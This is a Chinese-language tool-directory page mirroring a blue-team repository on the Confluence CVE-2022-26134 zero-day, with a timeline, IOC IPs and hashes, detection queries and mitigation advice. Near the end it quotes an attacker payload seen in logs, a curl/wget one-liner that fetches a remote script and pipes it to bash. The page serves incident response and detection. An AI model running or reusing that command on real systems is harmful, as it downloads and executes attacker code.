Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Confluence-CVE-2022-26134 — 本仓库探讨了 Atlassian Confluence 的零日漏洞利用,并从 SecOps 或蓝队(Blue Team)视角提供了防御与分析的视角。 | Kitploit
工具/GitHubGitHub/archanchoudhury/confluence-cve-2022-26134
危害指标 (IOC) 管理漏洞分析漏洞利用取证分析Web安全威胁情报入侵检测学习与教育事件响应

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubarchanchoudhury/confluence-cve-2022-26134

Confluence-CVE-2022-26134

本仓库探讨了 Atlassian Confluence 的零日漏洞利用,并从 SecOps 或蓝队(Blue Team)视角提供了防御与分析的视角。

查看仓库
4384年前尚未审核

Confluence-CVE-2022-26134

本仓库从 SecOps 或蓝队视角讨论 Atlassian Confluence 的零日漏洞利用及其防御与分析。

目录

  • 关于
  • 时间线
  • 理解漏洞利用
  • IOC 列表
  • 检测策略
  • 缓解方案
  • 参考资料

关于

在美国阵亡将士纪念日周末期间,Volexity 对其客户拥有的两台运行 Atlassian Confluence Server 软件的面向互联网的 Web 服务器进行了事件响应调查。调查是在检测到主机上的可疑活动后开始的,这些活动包括将 JSP webshell 写入磁盘。Volexity 立即使用 Volexity Surge Collect Pro 从 Confluence Server 系统收集系统内存和关键文件进行分析。在对收集的数据进行彻底审查后,Volexity 能够确定服务器入侵源于攻击者发起漏洞利用以实现远程代码执行。Volexity 随后能够重现该漏洞利用,并识别出一个影响完全最新版本 Confluence Server 的零日漏洞。

在发现并验证此漏洞后,Volexity 于 2022 年 5 月 31 日联系 Atlassian 报告相关细节。Atlassian 此后确认了该漏洞,并将此问题分配为 CVE-2022-26134。已确认该漏洞在 Confluence Server 和 Data Center 的当前版本上有效。

时间线

  • 一份日期为 6 月 2 日 13:00 PT(20:00 UTC)的公告未描述该缺陷的性质,并透露已检测到“当前正在进行的活跃利用”。目前没有可用的补丁。
  • Volexity 发现 了 Confluence 中的一个零日漏洞,日期为 2022 年 6 月 3 日(GMT)
  • 2022 年 6 月 3 日(GMT)Atlassian:
    • 澄清了受影响的版本
    • 添加了 WAF 规则
    • 添加了修复可用的预计时间范围
  • 在 2022 年 6 月 3 日,我们观察到互联网上出现活跃的利用尝试以及被发布的 POC。
  • 2022 年 6 月 3 日上午 8 点 PDT(太平洋时间,-7 小时),Atlassian 提供了缓解信息,包括替换的 jar 和 class 文件
  • 2022 年 6 月 3 日上午 10 点 PDT(太平洋时间,-7 小时),Atlassian 更新了修复版本,并移除了关于添加 WAF 规则的临时建议。
  • 2022 年 6 月 3 日下午 4 点 PDT(太平洋时间,-7 小时),Atlassian 更新以澄清滚动升级的限制。

请参阅此处的技术细节。

理解漏洞利用

  • 你可以参考 Volexity 博客此处来了解此漏洞利用的工作原理的完整细节以及分析详情。
  • 观看此视频以了解该漏洞利用及其修复方法。

IOC 列表

  • 由于这是一个零日漏洞,并且非常容易被利用,因此没有专门的 IOC 列表。根据社区研究,观察到攻击者在利用后尝试部署 XMRIG、KINSING、MIRAI 等。
  • 漏洞利用字符串“看似”包含此字符串 ${。此模式未进行 URL 编码,并且不符合 URL 安全,因此在日志中会显示为:$%7B。
  • Volexity 博客提到了 Confluence 文件:noop.jsp
  • 存在一个没有路径信息的 .jsp 扩展名 webshell。例如此
  • 一些 IP 地址-
root@kitploit:~
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
  • 恶意 noop.jsp 的文件哈希
root@kitploit:~
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
  • 在 2022 年 6 月 4 日,已观察到大规模 Atlassian Confluence CVE-2022-26134 利用,特别是已确认有效的利用。从此处查找唯一 IP。

检测策略

  • 如果你有一个未打补丁的面向互联网的 Confluence Server 和 Data Center,明智的做法是将其视为已被入侵
  • 在磁盘上的 Confluence 路径中查找具有 .jsp 扩展名或任何其他扩展名的新文件。
  • 从 Tomcat 日志中查找可疑的子进程
root@kitploit:~
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
  • 在 (install directory)/logs/*.log 中查找字符串 ${
  • 在访问日志中尝试 egrep -a -i -f pattern.txt *.log ,其中 pattern.txt 应保存为 ${,或直接尝试 grep "\${" log file path,或尝试 grep "$%7B" log file path
  • 你可能收到针对 noop.js 的 Web 请求,因此可以尝试 findstr -i noop.jsp "logpath"
  • 你可能有不同的安装目录,因此请尝试在 confluence_install_dir/work/Standalone/ 目录中查找 $jspname_jsp.java。例如,如果你发现一个名称为 hack.jsp 的 shell,你应该会看到 hack_jsp.java。如果你在磁盘上找不到 hack.jsp,请尝试在 Web 日志中搜索对它的访问。这将提供它何时被访问/删除的重要线索。
  • EQL 查询 process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' 可以帮助识别,如 David 在所述
root@kitploit:~
./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp

因此,请查找上面未列出的新创建的文件

  • 检查磁盘上未列出的文件以及访问日志中带有 200 响应的文件。此外,检查这些文件是否被修改。特别是 noop.jsp 很常见,通常约为 103 字节。
  • 如果你已识别出 noop.jsp 文件触发了警报,请利用此脚本来确定它是否可疑。
  • 你可以使用此脚本对日志进行快速扫描,以查看潜在威胁行为者。注意 - 使用此脚本前应验证 IP 列表,而且该列表并非详尽无遗。
  • 检查多个案例,在 ./confluence/org/apache/jsp/ 目录中查找不应存在的 .java 文件。
  • 在任何你识别出漏洞利用尝试的主机上查找进程树和进程执行。你应该查找如下进程树 - java->bash->python->bash
  • 一个由 python 进程派生的 bash 进程,其父进程是另一个 bash 进程,然后向上是 java 根进程名。应识别此类执行。

缓解方案

  • 截至本仓库的首次提交,Atlassian 已从此处发布了 Confluence Server 和 Data Center 的修补版本。
  • 如果你无法立即升级 Confluence,那么作为一个临时解决方法,你可以通过按照此处所述更新相关文件来缓解 CVE-2022-26134 问题。
  • 作为即时步骤,请制定事件响应计划,以识别暴露于互联网的实例并执行检测。并将服务器置于 IP 白名单或 VPN 之后,以降低风险面。

参考资料

  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
  • https://www.theregister.com/2022/06/03/atlassian_confluence_critical_flaw_attacked/
  • https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
  • https://www.shodan.io/search?query=x-confluence
  • https://www.shodan.io/search?query=http.favicon.hash%3A-305179312
  • https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/
  • https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
  • https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis?referrer=notificationEmail
  • https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/
下载工具
此处
  • 在 Web 日志中查找此常见 payload bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash
  • 可以在此处找到 Suricata 签名此处
  • 每个人的设置可能不同,但 Confluence 大多只有这些 JSP 文件: